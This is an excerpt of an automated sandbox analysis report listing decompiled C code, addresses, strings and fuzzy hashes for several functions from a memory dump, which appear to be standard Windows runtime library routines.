0x037ffcc5
0x037ffcc7
0x00000000
0x037ffcc9
0x037ffcc9
0x037ffccd
0x00000000
0x037ffccd
0x037ffcc7
0x00000000
0x037ffc4b
0x037ffc4b
0x037ffc4e
0x037ffc4e
0x037ffc51
0x037ffc51
0x037ffc54
0x037ffc5a
0x037ffc5c
0x037ffc5f
0x037ffc61
0x037ffc63
0x037ffc65
0x037ffc67
0x037ffc6e
0x037ffc72
0x037ffc72
0x037ffc72
0x037ffc72
0x037ffc67
0x037ffc61
0x00000000
0x037ffc5a
0x037ffc49
0x037ffc41
0x037ffc30
0x037ffc27
0x037ffc03
0x037ffbcd
0x037ffbd3
0x037ffbd9
0x037ffbdc
0x037ffbde
0x037ffc99
0x037ffc9b
0x037ffc9d
0x037ffcd5
0x037ffcd5
0x037ffc89
0x037ffc89
0x00000000
0x037ffc9f
0x037ffc9f
0x037ffca3
0x00000000
0x037ffca3
0x00000000
0x037ffbe4
0x037ffbe4
0x037ffbe4
0x037ffbe4
0x037ffbe9
0x037ffbf2
0x00000000
0x037ffbf2
0x037ffbde
0x037ffbcb
0x037ffbab
0x037ffc8b
0x037ffc8b
0x037ffc8c
0x037ffb80
0x037ffb72
0x037ffb5e
0x037ffc8d
0x037ffc91
0x037ffadf
0x037ffadf
0x037ffae1
0x037ffae4
0x037ffae7
0x037ffaec
0x037ffaf8
0x037ffb00
0x037ffb07
0x037ffb0f
0x037ffb0f
0x037ffb07
0x00000000
0x037ffaf8
0x037ffadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0383BE0F

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 6ece77863586bf37034f1c030cb4e32e33090ab6b8ebc2948b3ca1f81d6fd7d5
Instruction ID: acc5257abe961f9df73181a620cb9fb1ca745af69abf4dc812505c1ab2afed32
Opcode Fuzzy Hash: 6ece77863586bf37034f1c030cb4e32e33090ab6b8ebc2948b3ca1f81d6fd7d5
Instruction Fuzzy Hash: 09A1E175A017568FDB25DFA8C454B7AB3E9BF45720F0845AAEA06DB790EF30D801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 037C2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E037C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x38b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x38b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E038097C0();
				}
				if( *0x38b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x38b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E037F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E037E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0385FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03809520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E037FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0381DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x38b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x38b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03809980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E038095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E037E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E037E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03847016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0385FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x38b5350;
							if(_t109 != 0x38b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0385FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03855720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x037c2d8a
0x037c2d8a
0x037c2d92
0x037c2d96
0x037c2d9e
0x037c2da0
0x037c2da3
0x037c2da5
0x037c2da8
0x037c2dab
0x037c2db2
0x0381f9aa
0x0381f9ab
0x0381f9ae
0x0381f9ae
0x037c2db8
0x037c2dc2
0x0381f9b9
0x0381f9be
0x0381f9bf
0x0381f9bf
0x037c2dcf
0x0381f9c9
0x037c2dd5
0x037c2dd5
0x037c2dd5
0x037c2dde
0x037c2de1
0x037c2e70
0x037c2e72
0x037c2e72
0x037c2de7
0x037c2deb
0x037c2e7c
0x037c2e83
0x037c2e85
0x037c2e8b
0x037c2e8d
0x037c2e92
0x037c2e92
0x037c2e85
0x037c2df1
0x037c2df7
0x037c2df9
0x037c2df9
0x037c2dfc
0x037c2dff
0x037c2e02
0x00000000
0x037c2e05
0x037c2e0c
0x0381f9d9
0x037c2e12
0x037c2e12
0x037c2e12
0x037c2e1a
0x0381f9e3
0x0381f9e9
0x0381f9f0
0x0381f9f6
0x0381f9f8
0x0381f9f8
0x0381f9f0
0x037c2e23
0x0381fa02
0x0381fa03
0x0381fa05
0x0381fa06
0x00000000
0x037c2e29
0x037c2e29
0x037c2e2e
0x037c2e34
0x037c2e3e
0x00000000
0x00000000
0x037c2e44
0x037c2e47
0x037c2e4d
0x00000000
0x00000000
0x037c2e4f
0x037c2e54
0x00000000
0x00000000
0x037c2e5a
0x037c2e5f
0x037c2e9a
0x037c2ea4
0x037c2ea5
0x037c2ea8
0x037c2eaf
0x037c2eb2
0x037c2eb5
0x0381fae9
0x0381faeb
0x0381faed
0x0381faef
0x0381faf7
0x0381faf8
0x0381fafd
0x0381faff
0x0381fb04
0x0381fb04
0x0381faff
0x037c2ec0
0x037c2ec4
0x037c2ec6
0x037c2ec8
0x0381fb14
0x0381fb18
0x0381fb1e
0x0381fb21
0x0381fb21
0x037c2ece
0x037c2ece
0x037c2ece
0x037c2ed7
0x037c2e61
0x037c2e63
0x0381fa6b
0x0381fa71
0x0381fa76
0x0381fa78
0x0381fa8a
0x0381fa7a
0x0381fa83
0x0381fa83
0x0381fa8f
0x0381fa91
0x0381fa97
0x0381fa9d
0x0381faa4
0x0381faaa
0x0381faaf
0x0381fab1
0x0381fac3
0x0381fab3
0x0381fabc
0x0381fabc
0x0381fac8
0x0381facb
0x0381fadf
0x0381fadf
0x0381facb
0x0381faa4
0x0381fa91
0x037c2e6f
0x037c2e6f
0x037c2e5f
0x0381fa13
0x0381fa15
0x0381fa17
0x0381fa1f
0x0381fa21
0x0381fa22
0x0381fa25
0x0381fa28
0x0381fa2f
0x0381fa2f
0x0381fa2a
0x0381fa2a
0x0381fa2a
0x0381fa31
0x0381fa34
0x0381fa36
0x0381fa3c
0x0381fa3e
0x0381fa41
0x0381fa43
0x0381fa45
0x0381fa45
0x0381fa41
0x0381fa3c
0x0381fa4a
0x0381fa4f
0x0381fa51
0x0381fa53
0x0381fa56
0x0381fa5b
0x0381fa5e
0x00000000
0x0381fa5e
0x037c2e23

Strings

RTL: Re-Waiting, xrefs: 0381FA4A

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 43c2db053a77b88c41a7200cca583831e3f5ceebc8e6270dbb339153d6758eb6
Instruction ID: 44ef9853aeaceb76f3a10c13f47a12e5f955ff3a5ff7beaa54e22beda77e4259
Opcode Fuzzy Hash: 43c2db053a77b88c41a7200cca583831e3f5ceebc8e6270dbb339153d6758eb6
Instruction Fuzzy Hash: C861F831A00784DFDF21DBA8C854B7EB7A9EB49714F280ADDE611EB2D2C7349941C791

Uniqueness

Uniqueness Score: -1.00%

Function 03890EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03890EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0388FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03891074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03809730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0388A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0388A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x38b8b04 >> 0x14) + (_v44 -  *0x38b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E037E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0388138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E037E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0387FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x38b8724 & 0x00000008) != 0) {
						E038852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E038915B5(0x38b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x03890eb7
0x03890eb9
0x03890ec0
0x03890ec2
0x03890ecd
0x0389105b
0x0389105b
0x03891061
0x03891066
0x03891066
0x0389106b
0x03891073
0x03891073
0x03890ed3
0x03890ed6
0x03890edc
0x03890ee0
0x03890ee7
0x03890ef0
0x03890ef5
0x03890efa
0x03890efc
0x03890efd
0x03890f03
0x03890f04
0x03890f06
0x03890f07
0x03890f09
0x03890f0e
0x03890f14
0x03890f23
0x03890f2d
0x03890f34
0x03890f34
0x03890f14
0x03890f52
0x00000000
0x00000000
0x03890f58
0x03890f73
0x03890f74
0x03890f79
0x03890f7d
0x03890f80
0x03890f86
0x03890fab
0x03890fb5
0x03890fc6
0x03890fd1
0x03890fe3
0x03890fd3
0x03890fdc
0x03890fdc
0x03890feb
0x03891009
0x03891009
0x03891015
0x03891027
0x03891017
0x03891020
0x03891020
0x0389102f
0x0389103c
0x0389103c
0x03891048
0x03891050
0x03891050
0x03891055
0x00000000
0x03891055
0x03890f88
0x03890f9e
0x03890fa2
0x03890fa9
0x00000000
0x00000000
0x00000000
0x03890fa9
0x00000000

Strings

`, xrefs: 03890F16

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 196209e6cc1de29e08042d28df6db85ed90e9ae7f660c6915bb7e584a79de0f7
Instruction ID: d041490c77f1f2bb00f29dd38db66d54e044eb90e0c750c8afe998a27683470c
Opcode Fuzzy Hash: 196209e6cc1de29e08042d28df6db85ed90e9ae7f660c6915bb7e584a79de0f7
Instruction Fuzzy Hash: 0151C4712083829FE724DFA9D884B1BB7E5EBC4704F0809AEF556DB290D771E905C762

Uniqueness

Uniqueness Score: -1.00%

Function 037FF0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E037FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E037E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03809830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03809990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E038095D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x1d1cd81a
							_t109 = L037E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x20031d1c
								E0380F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x20031d1c
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E038095D0();
										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x037ff0d3
0x037ff0d9
0x037ff0e0
0x037ff0e7
0x037ff0f2
0x037ff0f4
0x037ff0f8
0x037ff100
0x037ff108
0x037ff10d
0x037ff115
0x037ff116
0x037ff11f
0x037ff123
0x037ff124
0x037ff12c
0x037ff130
0x037ff134
0x037ff13d
0x037ff144
0x037ff14b
0x037ff152
0x0383bab0
0x0383bab0
0x037ff158
0x037ff158
0x037ff15a
0x037ff160
0x037ff165
0x037ff166
0x037ff16f
0x037ff173
0x0383baa7
0x0383baa7
0x0383baab
0x00000000
0x037ff179
0x037ff179
0x037ff18d
0x037ff191
0x0383baa2
0x00000000
0x037ff197
0x037ff19b
0x037ff1a2
0x037ff1a9
0x037ff1af
0x037ff1b2
0x037ff1b6
0x037ff1b9
0x037ff1c0
0x037ff1c4
0x037ff1d8
0x037ff1df
0x037ff1e3
0x037ff1e6
0x037ff1eb
0x037ff1ee
0x037ff1f4
0x037ff20f
0x0383bab7
0x0383babb
0x0383bacc
0x0383bad1
0x037ff215
0x037ff218
0x037ff226
0x037ff22b
0x00000000
0x037ff22b
0x037ff1f6
0x037ff1f6
0x037ff1f9
0x037ff1fb
0x037ff1fb
0x037ff1f4
0x037ff191
0x037ff173
0x037ff152
0x037ff203

Strings

@, xrefs: 037FF124

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 046106c03eef32d36db05d1f291d5b6be004cc1292ee7d3ed25d62e2989065dc
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: C1515A755057109FC321DF69C840A6BBBE8FF48710F10892DFA959B6A0E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03843540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03843540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x38bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03800BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03843706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0380FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03843540;
						E0380FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0381DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03850C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E038097C0();
					}
					return E0380B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03843971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03843884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0380FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03809650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03843787(_a4,  &_v352, _t80);
						}
					}
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E038095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x03843552
0x0384355a
0x0384355d
0x03843566
0x03843567
0x0384357e
0x0384358f
0x038435a1
0x038435a5
0x0384366b
0x0384366b
0x0384366d
0x03843672
0x03843679
0x03843685
0x0384368d
0x0384369d
0x038436a7
0x038436b8
0x038436c6
0x038436c7
0x038436dc
0x038436e1
0x038436e7
0x038436e9
0x038436e9
0x03843703
0x03843703
0x038435b5
0x038435c0
0x038435c4
0x00000000
0x00000000
0x038435ca
0x038435d7
0x038435e2
0x038435e6
0x038435e8
0x038435f5
0x038435fa
0x03843603
0x03843604
0x03843609
0x0384360a
0x03843612
0x03843613
0x0384361e
0x03843622
0x03843628
0x0384362f
0x0384362f
0x03843636
0x03843638
0x0384363b
0x03843642
0x03843642
0x03843636
0x03843657
0x03843657
0x0384365c
0x03843662
0x03843669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0384358F

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: ee5f22c5c2cc20db6f10baa5e693e1093ba94b8de928bb17385569fde90a1d0b
Instruction ID: 263799420500c90f31d0ec9160de7f8b67841d8db4defa6a80b1088232bba310
Opcode Fuzzy Hash: ee5f22c5c2cc20db6f10baa5e693e1093ba94b8de928bb17385569fde90a1d0b
Instruction Fuzzy Hash: 724176F5D0062D9BDB61DA94CC80FDEB77CAB44714F0045E5EA09EB280DB709E988F95

Uniqueness

Uniqueness Score: -1.00%

Function 038905AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E038905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E038907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03809730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0388A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0388A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03891293(_t79, _v40, E038907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E037E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0388138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x038905c5
0x038905ca
0x038905d3
0x038906db
0x038906db
0x038906dd
0x038906e3
0x038906e3
0x038905dd
0x038905e7
0x038905f6
0x03890600
0x03890607
0x03890610
0x03890615
0x0389061a
0x0389061c
0x0389061e
0x03890624
0x03890625
0x03890627
0x03890628
0x03890631
0x03890640
0x0389064d
0x03890654
0x03890654
0x03890631
0x0389066d
0x03890674
0x00000000
